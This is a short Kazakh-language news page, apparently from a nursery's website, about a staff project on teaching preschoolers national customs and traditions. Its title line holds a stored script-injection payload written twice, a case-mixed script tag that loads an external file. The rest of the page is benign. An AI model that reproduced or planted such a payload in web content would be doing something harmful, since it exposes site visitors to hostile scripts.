"Этнопедагогика" басым бағыты бойынша жоба: «Ұлттық салт – дәстүрімізді насихаттау». Тәрбиешілер: Ахметжанова Марал Жұмабаева, Каиргельдиева Альмира Болатовна<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

16.04.2024

«Ұлттық салт – дәстүрімізді насихаттау»

 

Салт-дәстүр- халықтың атадан балаға көшіп жалғасып және дамып отыратын тарихи әлеуметтік, мәдени тұрмыстық, салт-сана, әдет-ғұрып, мінез-құлық, тәлім-тәрбие және рухани іс-әрекеттер көрнісі.

"Қуаныш" бөбекжайында ағымдағы жылдың 10 сәуірінде педагогтармен «Ата-баба дәстүрі- ұрпаққа өнеге» тақырыбында жоба қорғалды. Ахметжанова Марал Жұмабаева, Каиргельдиева Альмира Болатовна жобамен таныстырып, өз тәжірибелерімен бөлісті.

Жобаның мақсаты: Мектеп жасына дейінгі балаларға ата-бабадан қалған асыл мұра - ауыз әдебиет үлгілері, ұлттық бұйымдар, сәндік қолданбалы өнер туралы әңгімелеу және халқымыздың ғасырдан ғасырға жалғасып келе жатқан салт-дәстүрлерін дәріптеу.

Қазақ халқының ұлттық салт-дәстүрлерінің бірі – нәрестені қырқынан шығару, бесікке салудың, түсау кесудің мағынасын ашу. Қазақ халқының  ұлттық, салт-дәстүрлерінің тәрбиелік мәнін ұғындыра отырып, осы дәстүрлердің танымдық, тәрбиелік маңызы зор екенің көрсету. Балаларды салт-дәстүрлерді құрметтеуге, адамгершілікке, мейірімділікке, тазалыққа тәрбиелеу.

Просмотров: 532


Пікір қосу



Деректерді қолтаңбаға қосу